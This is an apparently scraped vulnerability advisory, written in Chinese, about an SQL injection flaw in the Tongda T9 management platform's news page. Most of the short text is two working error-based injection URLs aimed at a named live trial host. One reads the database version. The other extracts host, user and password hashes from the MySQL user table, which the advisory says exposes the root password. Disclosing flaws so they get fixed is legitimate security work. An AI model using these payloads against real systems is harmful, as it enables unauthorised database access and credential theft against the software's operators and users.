T9智能管理平台标准版SQL注入漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 通达T9智能管理平台标准版存在SQL注入漏洞。 ### 详细说明: 通达T9智能管理平台标准版的在线试用地址是http://t9.go2oa.com:86/t9/login.jsp,登陆后,core/funcs/news/show/reNews.jsp页面存在mysql报错注入漏洞,可以获取系统数据信息。 1、http://t9.go2oa.com/t9/core/funcs/news/show/reNews.jsp?seqId=eqId=15' union select '1' from (select count(*),concat(floor(rand(0)*2),0x3a,(select @@version from flow_sort limit 3,1))a from flow_sort group by a)b where 1=1 or '1'='1 [<img src="https://images.seebug.org/upload/201403/17215954973d49f93a6c13ea75782cbd1c44334a.png" alt="20140317215933.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201403/17215954973d49f93a6c13ea75782cbd1c44334a.png) 2、爆root用户密码 http://t9.go2oa.com/t9/core/funcs/news/show/reNews.jsp?seqId=eqId=15' union select '1' from (select count(*),concat(floor(rand(0)*2),0x3a,(select concat(host,user,password) from mysql.user limit 0,1))a from flow_sort group by a)b where 1=1 or '1'='1 [<img...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息